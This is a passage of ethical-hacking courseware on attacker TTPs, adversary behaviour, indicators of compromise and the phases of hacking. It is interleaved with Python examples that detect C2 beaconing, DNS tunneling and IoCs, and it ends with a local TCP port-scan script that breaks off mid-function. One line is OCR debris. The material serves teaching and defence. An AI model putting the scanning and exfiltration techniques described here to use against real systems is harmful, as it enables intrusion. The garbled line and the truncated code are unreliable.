In some cases, understanding the tactics used in the last stages of an attack helps in profiling the threat actor. Also, the methods used to cover the tracks help the target organization understand attack campaigns. Analyzing the tactics used by the attackers helps in creating an initial profile by understanding the different phases of an APT life cycle. This profile helps in performing further analysis of the techniques and procedures used by the attackers. An attacker may continually change the TTPs used, so it is important to constantly review and update the tactics used by the APT groups.
Techniques

To launch an attack successfully, threat actors use several techniques during its execution. These techniques include initial exploitation, setting up and maintaining command and control channels, accessing the target infrastructure, and covering the tracks of data exfiltration. The techniques followed by the threat actor to conduct an attack might vary, but they are mostly similar and can be used for profiling. Therefore, understanding the techniques used in the different phases of an attack is essential to analyzing the threat groups effectively.

Techniques can also be analyzed at each stage of the threat life cycle. Therefore, the techniques at the initial stage mainly describe the tools used for information gathering and initial exploitation. The techniques used in this stage need not necessarily have a technical aspect. For example, in social engineering, certain non-technical software tools are used as an effective way of gathering information. An attacker can use such tools to obtain the email addresses of employees of the target organization through publicly available resources.

In the same manner, purely human-based social engineering can be used to perform the initial exploitation. For example, consider a scenario where the victim is tricked via a phone call into revealing their login credentials for accessing the target organization's internal network. These techniques are used in the initial phase of an attack to gather information about the target and break the first line of defense.

Techniques used in the middle stages of an attack mostly depend on technical tools for initially escalating privileges on systems that are compromised or performing lateral movements within the target organization's network. At this stage of an attack, the attackers use various exploits or misuse configuration vulnerabilities on the target system. They may also exploit network design flaws to gain access to other systems in the network. In all of these cases, either exploits or a collection of tools allows the attacker to perform a successful attack. In this scenario, the term "technique" is the set of tools and the way they are used to obtain intermediate results during an attack campaign.

The techniques in the last stage of an attack can have both technical and nontechnical aspects. In such a scenario, the techniques used for data stealing are usually based on network technology and encryption. For example, the threat actor encrypts the stolen files, transfers them through the established command and control channel, and copies them to their own system. After successfully executing the attack and transferring the files, the attacker follows certain purely technical techniques to cover their tracks. They use automated software tools to clear logs to evade detection.

After aggregating the techniques used in all the stages of an attack, the organization can use the information to profile the threat actors. In order to make an accurate attribution of threat actors, the organization must observe all the techniques used by its adversaries.
Procedures

"Procedures" involve a sequence of actions performed by the threat actors to execute different steps of an attack life cycle. The number of actions usually differs depending upon the objectives of the procedure and the APT group. An advanced threat actor uses advanced procedures that consist of more actions than a normal procedure to achieve the same intermediate result. This is done mainly to increase the success rate of an attack and decrease the probability of detection by security mechanisms.

For example, in a basic procedure of information gathering, an actor collects information about the target organization; identifies key targets and employees; collects their contact details; identifies vulnerable systems and potential entry points to the target network; and documents all the collected information. The further actions of an adversary depend on the tactics used. These actions include extensive research and repeated information gathering to collect in-depth and up-to-date information on the target individuals via social networking sites. This information can assist threat actors in performing spear phishing, monitoring security controls to identify zero-day exploits in the target systems, and other tasks. For example, a threat actor using a more detailed procedure executes the malware payload. At the time of execution, the malicious code decrypts itself, evades security monitoring controls, deploys persistence, and establishes a command and control channel for communicating with the victim system. This type of procedure is common for malware, where different threat actors may implement the same feature, and hence it is useful in forensic investigations.

An understanding and proper analysis of the procedures followed by certain threat actors during an attack helps organizations profile threat actors. In the initial stage of an attack, such as during information gathering, observing the procedure of an APT group is difficult. However, the later stages of an attack can leave trails that may be used to understand the procedures the attacker followed.

Adversary Behavioral Identification

Adversary behavioral identification involves the identification of the common methods or techniques followed by an adversary to launch attacks to penetrate an organization's network. It gives security professionals insight into upcoming threats and exploits. It helps them plan network security infrastructure and adapt a range of security procedures as prevention against various cyberattacks.

Given below are some of the behaviors of an adversary that can be used to enhance the detection capabilities of security devices:
Internal Reconnaissance

Once the adversary is inside the target network, they follow various techniques and methods to carry out internal reconnaissance. This includes the enumeration of systems, hosts, and processes, and the execution of various commands to find out information such as the local user context and system configuration, hostname, IP addresses, active remote systems, and programs running on the target systems. Security professionals can monitor the activities of an adversary by checking for unusual commands executed in Batch scripts and PowerShell and by using packet capturing tools.

Use of PowerShell

PowerShell can be used by an adversary as a tool for automating data exfiltration and launching further attacks. To identify the misuse of PowerShell in the network, security professionals can check PowerShell's transcript logs or Windows Event logs. The user agent string and IP addresses can also be used to identify malicious hosts who try to exfiltrate data.

Unspecified Proxy Activities

An adversary can create and configure multiple domains pointing to the same host, thus allowing the adversary to switch quickly between the domains to avoid detection. Security professionals can find unspecified domains by checking the data feeds that are generated by those domains. Using this data feed, the security professionals can also find any malicious files downloaded and the unsolicited communication with the outside network based on the domains.
Use of Command-Line Interface

On gaining access to the target system, an adversary can make use of the command-line interface to interact with the target system, browse the files, read file content, modify file content, create new accounts, connect to the remote system, and download and install malicious code. Security professionals can identify this behavior of an adversary by checking the logs for process IDs, processes having arbitrary letters and numbers, and malicious files downloaded from the Internet.

HTTP User Agent

In HTTP-based communication, the server identifies the connected HTTP client using the user agent field. An adversary modifies the content of the HTTP user agent field to communicate with the compromised system and to carry out further attacks. Therefore, security professionals can identify this attack at an initial stage by checking the content of the user agent field.

Command and Control Server
Adversaries use command and control servers to communicate remotely with compromised systems through an encrypted session. Using this encrypted channel, the adversary can steal data, delete data, and launch further attacks. Security professionals can detect compromised hosts or networks by identifying the presence of a command and control server by tracking network traffic for outbound connection attempts, unwanted open ports, and other anomalies.
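One concrete way to track outbound connection attempts for a command and control server is to look for beaconing: an implant that calls home on a near-fixed schedule produces connection gaps with very low variation. The following is an added example (not from the EC-Council courseware); the flow records, IP addresses and thresholds are constructed for illustration.

```python
"""Flag beaconing in constructed outbound-connection records.

Each record is "<ISO timestamp> <source IP> <destination IP> <port>".
Connections are grouped per (source, destination, port); a group with
enough connections whose gaps have a low coefficient of variation
(stdev / mean) is reported as a possible command and control beacon.
"""
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample (not captured traffic): 10.0.0.5 calls 203.0.113.10
# about once a minute; 10.0.0.7 browses 198.51.100.20 at irregular times.
SAMPLE_FLOWS = """\
2020-09-01T10:00:00 10.0.0.5 203.0.113.10 443
2020-09-01T10:00:05 10.0.0.7 198.51.100.20 443
2020-09-01T10:00:07 10.0.0.7 198.51.100.20 443
2020-09-01T10:00:40 10.0.0.7 198.51.100.20 443
2020-09-01T10:01:00 10.0.0.5 203.0.113.10 443
2020-09-01T10:02:01 10.0.0.5 203.0.113.10 443
2020-09-01T10:03:00 10.0.0.5 203.0.113.10 443
2020-09-01T10:03:12 10.0.0.7 198.51.100.20 443
2020-09-01T10:03:13 10.0.0.7 198.51.100.20 443
2020-09-01T10:04:00 10.0.0.5 203.0.113.10 443
2020-09-01T10:05:01 10.0.0.5 203.0.113.10 443
2020-09-01T10:06:00 10.0.0.5 203.0.113.10 443
2020-09-01T10:06:30 10.0.0.7 192.0.2.44 80
2020-09-01T10:09:50 10.0.0.7 198.51.100.20 443
2020-09-01T10:15:00 10.0.0.7 198.51.100.20 443
"""


def parse_flows(text):
    """Parse the records into (timestamp, src, dst, port) tuples."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port = line.split()
        flows.append((datetime.fromisoformat(ts), src, dst, int(port)))
    return flows


def group_intervals(flows):
    """Map each (src, dst, port) to the gaps in seconds between its connections."""
    times = defaultdict(list)
    for ts, src, dst, port in flows:
        times[(src, dst, port)].append(ts)
    intervals = {}
    for key, stamps in times.items():
        stamps.sort()
        intervals[key] = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
    return intervals


def find_beacons(text, min_connections=6, max_cv=0.1):
    """Return (src, dst, port, mean_gap, cv) for connection groups that look like beacons.

    A group needs at least min_connections connections so that a handful of
    coincidental requests does not trigger it, and a coefficient of variation
    below max_cv, meaning the host is calling out on a near-fixed schedule.
    """
    hits = []
    for (src, dst, port), gaps in group_intervals(parse_flows(text)).items():
        if len(gaps) + 1 < min_connections:
            continue  # too few connections to judge regularity
        mean = statistics.mean(gaps)
        if mean == 0:
            continue  # duplicate timestamps, not a schedule
        cv = statistics.stdev(gaps) / mean
        if cv < max_cv:
            hits.append((src, dst, port, round(mean, 1), round(cv, 3)))
    return hits


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_FLOWS):
        print("possible beacon: %s -> %s:%d every ~%ss (cv=%s)" % hit)
```

In real flow logs the thresholds need tuning per environment, since legitimate software updaters and monitoring agents also poll on fixed schedules and must be allow-listed.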
Use of DNS Tunneling

Adversaries use DNS tunneling to obfuscate malicious traffic in the legitimate traffic carried by common protocols used in the network. Using DNS tunneling, an adversary can also communicate with the command and control server, bypass security controls, and perform data exfiltration. Security professionals can identify DNS tunneling by analyzing malicious DNS requests, DNS payload, unspecified domains, and the destination of DNS requests.
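The three signals named above (request names, payload-carrying record types, and the domains being queried) can be scored per parent domain. The following is an added example (not from the EC-Council courseware) that profiles constructed DNS query-log lines in the format "<client> <query name> <record type>"; the domains, thresholds and log lines are assumptions made for this illustration.

```python
"""Score parent domains in constructed DNS query logs for tunneling signals.

Tunneling encodes data in the subdomain labels of queries to a domain the
adversary controls, so such domains show (1) long labels, (2) high-entropy
subdomains and (3) a bias towards record types that carry bulk data.
A domain showing at least two of the three signals is reported.
"""
import math
from collections import defaultdict

BULK_TYPES = {"TXT", "NULL"}

# Constructed query-log lines (not real traffic). example.com is ordinary
# browsing, example.net is a CDN with many short subdomains, and the five
# 32-character random-looking labels under example.org mimic a tunnel.
SAMPLE_QUERIES = """\
10.0.0.8 www.example.com A
10.0.0.8 cdn.example.com A
10.0.0.8 mail.example.com MX
10.0.0.8 api.example.com A
10.0.0.8 login.example.com A
10.0.0.8 _dmarc.example.com TXT
10.0.0.8 img1.example.net A
10.0.0.8 img2.example.net A
10.0.0.8 img3.example.net A
10.0.0.8 img4.example.net A
10.0.0.8 img5.example.net A
10.0.0.9 k3q9z1mf7xb0dw2hcj5nv4ypt8ae6glo.example.org TXT
10.0.0.9 f7xb0dw2hcj5nv4ypt8ae6glok3q9z1m.example.org TXT
10.0.0.9 w2hcj5nv4ypt8ae6glok3q9z1mf7xb0d.example.org TXT
10.0.0.9 nv4ypt8ae6glok3q9z1mf7xb0dw2hcj5.example.org TXT
10.0.0.9 8ae6glok3q9z1mf7xb0dw2hcj5nv4ypt.example.org TXT
"""


def shannon_entropy(s):
    """Bits of entropy per character of s (0.0 for an empty string)."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname):
    """Return (subdomain, parent) where parent is the last two labels."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) <= 2:
        return "", ".".join(labels)
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def profile_domains(text):
    """Aggregate per-parent-domain statistics from the query-log lines."""
    stats = defaultdict(lambda: {"subdomains": set(), "entropies": [],
                                 "max_label": 0, "bulk": 0, "total": 0})
    for line in text.splitlines():
        if not line.strip():
            continue
        _client, qname, qtype = line.split()
        sub, parent = split_name(qname)
        st = stats[parent]
        st["total"] += 1
        if qtype.upper() in BULK_TYPES:
            st["bulk"] += 1
        if sub:
            st["subdomains"].add(sub)
            st["entropies"].append(shannon_entropy(sub.replace(".", "")))
            st["max_label"] = max(st["max_label"], max(len(l) for l in sub.split(".")))
    return stats


def tunneling_suspects(text, min_label=25, min_entropy=3.5, min_bulk_fraction=0.5):
    """Return {parent: [signal names]} for domains showing at least two signals."""
    suspects = {}
    for parent, st in profile_domains(text).items():
        signals = []
        if st["max_label"] >= min_label:
            signals.append("long-labels")
        if st["entropies"] and sum(st["entropies"]) / len(st["entropies"]) >= min_entropy:
            signals.append("high-entropy")
        if st["total"] and st["bulk"] / st["total"] >= min_bulk_fraction:
            signals.append("bulk-record-types")
        if len(signals) >= 2:
            suspects[parent] = signals
    return suspects


if __name__ == "__main__":
    for parent, signals in tunneling_suspects(SAMPLE_QUERIES).items():
        print("possible DNS tunnel:", parent, ", ".join(signals))
```

Requiring two of three signals keeps a CDN with many short subdomains (example.net) and a single legitimate TXT lookup (_dmarc.example.com) from being flagged.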
Use of Web Shell

An adversary uses a web shell to manipulate the web server by creating a shell within a website; it allows an adversary to gain remote access to the functionalities of a server. Using a web shell, an adversary performs various tasks such as data exfiltration, file transfers, and file uploads. Security professionals can identify the web shell running in the network by analyzing server access and error logs, suspicious strings that indicate encoding, user agent strings, and through other methods.
Data Staging

After successful penetration into a target's network, the adversary uses data staging techniques to collect and combine as much data as possible. The types of data collected by an adversary include sensitive data about the employees and customers, the business tactics of an organization, financial information, and network infrastructure information. Once collected, the adversary can either exfiltrate or destroy the data. Security professionals can detect data staging by monitoring network traffic for malicious file transfers, file integrity monitoring, and event logs.

Indicators of Compromise (IoCs)
Cyber threats are continuously evolving with the newer TTPs adapted based on the vulnerabilities of the target organization. Security professionals must perform continuous monitoring of IoCs to effectively and efficiently detect and respond to evolving cyber threats.

Indicators of Compromise are the clues, artifacts, and pieces of forensic data that are found on a network or operating system of an organization that indicate a potential intrusion or malicious activity in the organization's infrastructure.

However, IoCs are not intelligence; rather, IoCs act as a good source of information about threats that serve as data points in the intelligence process. Actionable threat intelligence extracted from IoCs helps organizations enhance incident-handling strategies. Cybersecurity professionals use various automated tools to monitor IoCs to detect and prevent various security breaches to the organization. Monitoring IoCs also helps security teams enhance the security controls and policies of the organization to detect and block suspicious traffic to thwart further attacks. To overcome the threats associated with IoCs, some organizations, using standards like STIX and TAXII, have developed standardized reports that contain condensed data related to attacks and shared them with others to leverage the incident response.

An IoC is an atomic indicator, computed indicator, or behavioral indicator. It is the information regarding suspicious or malicious activities that is collected from various security establishments in a network's infrastructure. Atomic indicators are those that cannot be segmented into smaller parts, and whose meaning is not changed in the context of an intrusion. Examples of atomic indicators are IP addresses and email addresses. Computed indicators are obtained from the data extracted from a security incident. Examples of computed indicators are hash values and regular expressions. Behavioral indicators refer to a grouping of both atomic and computed indicators, combined on the basis of some logic.
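The three indicator classes can be put side by side in code: atomic values matched as-is, computed values derived from incident data, and a behavioral indicator that combines both with logic. The following is an added example (not from the EC-Council courseware); every indicator value, host name and event below is a constructed placeholder, not a real IoC.

```python
"""Match atomic, computed and behavioral IoCs against constructed events."""
import hashlib
import re

# Atomic indicators (placeholders): matched exactly, meaning is context-free.
ATOMIC_IPS = {"203.0.113.10"}
ATOMIC_EMAILS = {"invoice@attacker.example"}

# Computed indicators (placeholders): derived from incident data, here the
# SHA-256 of a constructed sample and a regex for its dropped-file names.
SAMPLE_HASH = hashlib.sha256(b"constructed-malware-sample").hexdigest()
COMPUTED_HASHES = {SAMPLE_HASH}
DROPPED_FILE_RE = re.compile(r"^[a-z]{6}\d{4}\.exe$")

# Constructed events in logging order: an email, a file write and a
# connection on ws-12; benign activity on ws-20; a lone connection on ws-31.
EVENTS = [
    {"host": "ws-12", "type": "email", "sender": "invoice@attacker.example",
     "attachment": "invoice.pdf.exe"},
    {"host": "ws-12", "type": "file_write", "name": "qwertz1234.exe",
     "sha256": SAMPLE_HASH},
    {"host": "ws-12", "type": "connection", "dst": "203.0.113.10", "dport": 443},
    {"host": "ws-20", "type": "file_write", "name": "setup.exe",
     "sha256": hashlib.sha256(b"benign installer").hexdigest()},
    {"host": "ws-20", "type": "connection", "dst": "198.51.100.7", "dport": 443},
    {"host": "ws-31", "type": "connection", "dst": "203.0.113.10", "dport": 443},
]


def atomic_hits(events):
    """(index, label) for events whose IP or sender equals an atomic indicator."""
    hits = []
    for i, ev in enumerate(events):
        if ev["type"] == "connection" and ev["dst"] in ATOMIC_IPS:
            hits.append((i, "ip:" + ev["dst"]))
        if ev["type"] == "email" and ev["sender"].lower() in ATOMIC_EMAILS:
            hits.append((i, "email:" + ev["sender"]))
    return hits


def computed_hits(events):
    """(index, label) for file events matching a known hash or name pattern."""
    hits = []
    for i, ev in enumerate(events):
        if ev["type"] != "file_write":
            continue
        if ev["sha256"] in COMPUTED_HASHES:
            hits.append((i, "sha256"))
        if DROPPED_FILE_RE.match(ev["name"]):
            hits.append((i, "filename-regex"))
    return hits


def behavioral_hits(events):
    """Hosts where a computed file match is followed by a connection to a C2 IP.

    This is the 'grouping combined by logic': the same atomic and computed
    indicators, ordered on one host, carry more weight than either alone.
    """
    computed_idx = {i for i, _ in computed_hits(events)}
    file_seen = set()
    flagged = []
    for i, ev in enumerate(events):
        if i in computed_idx:
            file_seen.add(ev["host"])
        if (ev["type"] == "connection" and ev["dst"] in ATOMIC_IPS
                and ev["host"] in file_seen and ev["host"] not in flagged):
            flagged.append(ev["host"])
    return flagged


def triage(events):
    """Summarize all three indicator classes for an analyst."""
    return {"atomic": atomic_hits(events),
            "computed": computed_hits(events),
            "behavioral": behavioral_hits(events)}


if __name__ == "__main__":
    for cls, hits in triage(EVENTS).items():
        print(cls, hits)
```

Note that ws-31 only produces an atomic hit: a single connection to a listed address is a data point for triage, whereas ws-12's behavioral hit already ties the delivery, installation and command and control stages together.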

Categories of Indicators of Compromise
Cybersecurity professionals must have proper knowledge about various possible threat actors and their tactics related to cyber threats, mostly called Indicators of Compromise (IoCs). This understanding of IoCs helps security professionals quickly detect the threats entering the organization and protect the organization from evolving threats. For this purpose, IoCs are divided into four categories:

Email Indicators

Attackers usually prefer email services to send malicious data to the target organization or individual. Such socially engineered emails are preferred due to their ease of use and comparative anonymity. Examples of email indicators include the sender's email address, email subject, and attachments or links.

Network Indicators

Network indicators are useful for command and control, malware delivery, and identifying details about the operating system, browser type, and other computer-specific information. Examples of network indicators include URLs, domain names, and IP addresses.

Host-Based Indicators

Host-based indicators are found by performing an analysis of the infected system within the organizational network. Examples of host-based indicators include filenames, file hashes, registry keys, DLLs, and mutexes.

Behavioral Indicators

Generally, typical IoCs are useful for identifying indications of intrusion, such as malicious IP addresses, MD5 hashes, virus signatures, and domain names. Behavioral IoCs are used to identify specific behavior related to malicious activities such as code injection into memory or running the scripts of an application. Well-defined behaviors enable broad protection to block all current and future malicious activities. These indicators are useful to identify when legitimate system services are used for abnormal or unexpected activities. Examples of behavioral indicators include a document executing a PowerShell script, and remote command execution.
Listed below are some of the key Indicators of Compromise (IoCs):

- Unusual outbound network traffic
- Unusual activity through a privileged user account
- Geographical anomalies
- Multiple login failures
- Increased database read volume
- Large HTML response size
- Multiple requests for the same file
- Mismatched port-application traffic
- Suspicious registry or system file changes
- Unusual DNS requests
- Unexpected patching of systems
- Signs of Distributed Denial-of-Service (DDoS) activity
- Bundles of data in the wrong places
- Web traffic with superhuman behavior
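The indicators above are only useful if something actually checks for them. The following is an added example, not part of the original text: a small Python rule set that runs over a batch of constructed log events (the field names are assumed, the thresholds are illustrative, and 10.0.0.0/8 is assumed to be the internal network) and flags several of the indicators listed above: multiple login failures, a geographical anomaly, privileged-account activity outside business hours, an unusual DNS request, and unusual outbound traffic volume.

```python
"""IoC detection over constructed log events.

Added example (not from the original text): a small rule set that flags
several of the key indicators listed above. Thresholds, the internal
network range and the sample events are illustrative assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import ipaddress

# Constructed sample telemetry; field names are assumptions, not a real log format.
EVENTS = [
    {"ts": "2020-03-02T02:15:00", "type": "auth", "user": "admin", "result": "success", "country": "US"},
    {"ts": "2020-03-02T09:00:01", "type": "auth", "user": "alice", "result": "fail", "country": "US"},
    {"ts": "2020-03-02T09:00:04", "type": "auth", "user": "alice", "result": "fail", "country": "US"},
    {"ts": "2020-03-02T09:00:07", "type": "auth", "user": "alice", "result": "fail", "country": "US"},
    {"ts": "2020-03-02T09:00:10", "type": "auth", "user": "alice", "result": "fail", "country": "US"},
    {"ts": "2020-03-02T09:00:13", "type": "auth", "user": "alice", "result": "fail", "country": "US"},
    {"ts": "2020-03-02T09:00:20", "type": "auth", "user": "alice", "result": "success", "country": "US"},
    {"ts": "2020-03-02T09:30:00", "type": "auth", "user": "alice", "result": "success", "country": "RO"},
    {"ts": "2020-03-02T10:00:00", "type": "auth", "user": "bob", "result": "fail", "country": "US"},
    {"ts": "2020-03-02T10:00:05", "type": "auth", "user": "bob", "result": "success", "country": "US"},
    {"ts": "2020-03-02T11:00:00", "type": "net", "src": "10.0.0.5", "dst": "203.0.113.9", "bytes": 600_000_000},
    {"ts": "2020-03-02T11:05:00", "type": "net", "src": "10.0.0.6", "dst": "10.0.0.7", "bytes": 900_000_000},
    {"ts": "2020-03-02T11:06:00", "type": "net", "src": "10.0.0.7", "dst": "198.51.100.2", "bytes": 4_000},
    {"ts": "2020-03-02T11:10:00", "type": "dns", "src": "10.0.0.5", "qname": "www.example.com"},
    {"ts": "2020-03-02T11:10:01", "type": "dns", "src": "10.0.0.5",
     "qname": "4a6f686e2d53746576656e732d31323334353637383930.tunnel.example"},
]

# Illustrative thresholds (assumptions to be tuned per environment).
FAIL_THRESHOLD = 5
FAIL_WINDOW = timedelta(minutes=10)
GEO_WINDOW = timedelta(hours=1)
PRIVILEGED = {"admin", "root"}
BUSINESS_HOURS = range(8, 19)            # 08:00-18:59
INTERNAL_NET = ipaddress.ip_network("10.0.0.0/8")
OUTBOUND_BYTES_THRESHOLD = 500_000_000   # per source host over the whole batch
DNS_LABEL_MAX = 40                       # very long labels hint at DNS tunneling


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def detect(events):
    """Return a list of (indicator, detail) tuples for the given events."""
    findings = []
    recent_fails = defaultdict(list)     # user -> failure timestamps inside FAIL_WINDOW
    logins = defaultdict(list)           # user -> [(timestamp, country)] of successes
    outbound = defaultdict(int)          # src -> bytes sent to hosts outside INTERNAL_NET

    for e in sorted(events, key=_ts):
        now = _ts(e)
        if e["type"] == "auth":
            user = e["user"]
            if e["result"] == "fail":
                window = [t for t in recent_fails[user] if now - t <= FAIL_WINDOW] + [now]
                recent_fails[user] = window
                if len(window) == FAIL_THRESHOLD:     # fire once, when the threshold is crossed
                    findings.append(("multiple login failures", user))
            else:
                for when, country in logins[user]:
                    if country != e["country"] and now - when <= GEO_WINDOW:
                        findings.append(("geographical anomaly", f"{user} {country}->{e['country']}"))
                        break
                logins[user].append((now, e["country"]))
                if user in PRIVILEGED and now.hour not in BUSINESS_HOURS:
                    findings.append(("unusual activity through a privileged account", user))
        elif e["type"] == "net":
            if ipaddress.ip_address(e["dst"]) not in INTERNAL_NET:
                outbound[e["src"]] += e["bytes"]
        elif e["type"] == "dns":
            labels = e["qname"].split(".")
            if max(len(label) for label in labels) > DNS_LABEL_MAX:
                findings.append(("unusual DNS request", f"{e['src']} {e['qname']}"))

    for src, total in outbound.items():
        if total > OUTBOUND_BYTES_THRESHOLD:
            findings.append(("unusual outbound network traffic", f"{src} {total} bytes"))
    return findings


if __name__ == "__main__":
    for indicator, detail in detect(EVENTS):
        print(f"{indicator}: {detail}")
```

Run it directly to print the five findings for the constructed batch; bob's single failed login stays below the threshold and produces nothing. In a real SIEM the same logic would be expressed as correlation rules and tuned against baseline traffic to keep false positives down.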

Module Flow: Hacking Concepts

This section deals with the basic concepts of hacking: what hacking is, who a hacker is, hacker classes, and the five distinct hacking phases that one should be familiar with before proceeding with the ethical hacking methodology.

08
Module 27
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
What is Hacking?

Hacking, in the field of computer security, refers to exploiting system vulnerabilities and compromising security controls to gain unauthorized or inappropriate access to system resources. It involves modifying system or application features to achieve a goal outside its creator's original purpose. Hacking can be done to steal, pilfer, or redistribute intellectual property, thus leading to business loss.

Hacking on computer networks is generally done using scripts or other network programming. Network hacking techniques include creating viruses and worms, performing denial-of-service (DoS) attacks, establishing unauthorized remote access connections to a device using trojans or backdoors, creating botnets, packet sniffing, phishing, and password cracking. The motive behind hacking could be to steal critical information or services, for thrill, intellectual challenge, curiosity, knowledge, experiment, financial gain, prestige, power, peer recognition, vengeance and vindictiveness, among other reasons.

Who is a Hacker?

A hacker is a person who breaks into a system or network without authorization to destroy, steal sensitive data, or perform malicious attacks. A hacker is an intelligent individual with excellent computer skills, along with the ability to create and explore the computer's software and hardware. Usually, a hacker is a skilled engineer or programmer with enough knowledge to discover vulnerabilities in a target system. They generally have subject expertise and enjoy learning the details of various programming languages and computer systems. For some hackers, hacking is a hobby to see how many computers or networks they can compromise. Their intention can either be to gain knowledge or to poke around to do illegal things. Some hack with malicious intent behind their escapades, like stealing business data, credit card information, social security numbers, and email passwords.

Hacker Classes

Hackers usually fall into one of the following categories, according to their activities:

Black Hats: Black hats are individuals who use their extraordinary computing skills for illegal or malicious purposes. This category of hacker is often involved in criminal activities. They are also known as crackers.

White Hats: White hats or penetration testers are individuals who use their hacking skills for defensive purposes. These days, almost every organization has security analysts who are knowledgeable about hacking countermeasures, which can secure its network and information systems against malicious attacks. They have permission from the system owner.

Gray Hats: Gray hats are the individuals who work both offensively and defensively at various times. Gray hats might help hackers find various vulnerabilities in a system or network and, at the same time, help vendors to improve products (software or hardware) by checking limitations and making them more secure.

Suicide Hackers: Suicide hackers are individuals who aim to bring down critical infrastructure for a "cause" and are not worried about facing jail terms or any other kind of punishment. Suicide hackers are similar to suicide bombers who sacrifice their life for an attack and are thus not concerned with the consequences of their actions.

Script Kiddies: Script kiddies are unskilled hackers who compromise systems by running scripts, tools, and software developed by real hackers. They usually focus on the quantity rather than the quality of the attacks that they initiate.
Cyber Terrorists: Cyber terrorists are individuals with a wide range of skills, motivated by religious or political beliefs, to create fear of large-scale disruption of computer networks.

State-Sponsored Hackers: State-sponsored hackers are individuals employed by the government to penetrate, gain top-secret information from, and damage the information systems of other governments.

Hacktivist: Hacktivism is when hackers break into government or corporate computer systems as an act of protest. Hacktivists use hacking to increase awareness of their social or political agendas, as well as to boost their own reputations in both the online and offline arenas. They are individuals who use hacking to promote a political agenda, especially by defacing or disabling websites. Common hacktivist targets include government agencies, multinational corporations, and any other entity that they perceive as a threat. Irrespective of the hacktivists' intentions, the gaining of unauthorized access is a crime.

Hacking Phases

In general, there are five phases of hacking:

- Reconnaissance
- Scanning
- Gaining Access
- Maintaining Access
- Clearing Tracks

Hacking Phase: Reconnaissance

Reconnaissance refers to the preparatory phase in which an attacker gathers as much information as possible about the target prior to launching the attack. In this phase, the attacker draws on competitive intelligence to learn more about the target. It could be the future point of return, noted for ease of entry for an attack when more about the target is known on a broad scale. The reconnaissance target range may include the target organization's clients, employees, operations, network, and systems.

This phase allows attackers to plan the attack. It may take some time as the attacker gathers as much information as possible. Part of this reconnaissance may involve social engineering. A social engineer is a person who convinces people to reveal information such as unlisted phone numbers, passwords, and other sensitive information. For instance, the hacker could call the target's Internet service provider and, using personal information previously obtained, convince the customer service representative that the hacker is actually the target, and in doing so, obtain even more information about the target.

Another reconnaissance technique is dumpster diving. Dumpster diving is, simply enough, looking through an organization's trash for any discarded sensitive information. Attackers can use the Internet to obtain information such as employees' contact information, business partners, technologies currently in use, and other critical business knowledge. Dumpster diving may provide attackers with even more sensitive information, such as usernames, passwords, credit card statements, bank statements, ATM receipts, Social Security numbers, private telephone numbers, checking account numbers, or other sensitive data.

Searching for the target company's web site in the Internet's Whois database can easily provide hackers with the company's IP addresses, domain names, and contact information.
Reconnaissance Types

Reconnaissance techniques are broadly categorized into active and passive. When an attacker is using passive reconnaissance techniques, they do not interact with the target directly. Instead, the attacker relies on publicly available information, news releases, or other no-contact methods. Active reconnaissance techniques, on the other hand, involve direct interactions with the target system by using tools to detect open ports, accessible hosts, router locations, network mapping, details of operating systems, and applications. Attackers use active reconnaissance when there is a low probability of the detection of these activities. For example, they may make telephone calls to the help desk or technical department.

As an ethical hacker, it is important to be able to distinguish among the various reconnaissance methods and advocate preventive measures in the light of potential threats. Companies, on their part, must address security as an integral part of their business and operational strategies, and be equipped with the proper policies and procedures to check for potential vulnerabilities.

Hacking Phase: Scanning

Scanning is the phase immediately preceding the attack. Here, the attacker uses the details gathered during reconnaissance to scan the network for specific information. Scanning is a logical extension of active reconnaissance, and in fact, some experts do not differentiate scanning from active reconnaissance. There is a slight difference, however, in that scanning involves more in-depth probing on the part of the attacker. Often the reconnaissance and scanning phases overlap, and it is not always possible to separate the two. An attacker can gather critical network information such as the mapping of systems, routers, and firewalls by using simple tools such as the standard Windows utility Traceroute. Alternatively, they can use tools such as Cheops to add additional information to Traceroute's results.

Scanning can include the use of dialers, port scanners, network mappers, ping tools, vulnerability scanners, or other tools. Attackers extract information such as live machines, ports, port status, OS details, device type, and system uptime to launch an attack.
Port scanners detect listening ports to find information about the nature of services running on the target machine. The primary defense technique against port scanners is shutting down services that are not required and implementing appropriate port filtering. However, attackers can still use tools to determine the rules implemented by the port filtering.
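As an added example (not from the original text), the following Python script shows the core of what a port scanner does and why shutting down unneeded services defeats it: it starts a TCP listener on 127.0.0.1 so that everything runs offline, performs a TCP connect scan against the listening port and a port that is known to be closed, then closes the listener and scans again. Port numbers are chosen at run time; the loopback host and the timeout value are this example's assumptions.

```python
"""TCP connect scan against a local listener.

Added example (not from the original text and not a real scanner): starts
a listener on 127.0.0.1 so the scan runs offline, probes a handful of
ports, then closes the listener to show that shutting down a service
removes its port from the scan result. Real tools such as Nmap add SYN
(half-open) scans, service fingerprinting and timing control.
"""
import socket


def start_listener(host="127.0.0.1"):
    """Bind and listen on an ephemeral port; return (socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)
    return srv, srv.getsockname()[1]


def free_port(host="127.0.0.1"):
    """Return a port that is currently not listening (bind, read it back, close)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind((host, 0))
        return s.getsockname()[1]


def tcp_connect_scan(host, ports, timeout=0.5):
    """Return the subset of ports on which a full TCP handshake succeeds.

    connect_ex() returns 0 on success and an errno otherwise, so a refused
    connection (nothing listening) or a timeout (filtered) both count as
    not open. A connect scan completes the handshake and so shows up in the
    target's connection logs, which is why attackers often prefer SYN scans.
    """
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports


def demo():
    """Scan before and after the service is shut down; return both results."""
    srv, listening = start_listener()
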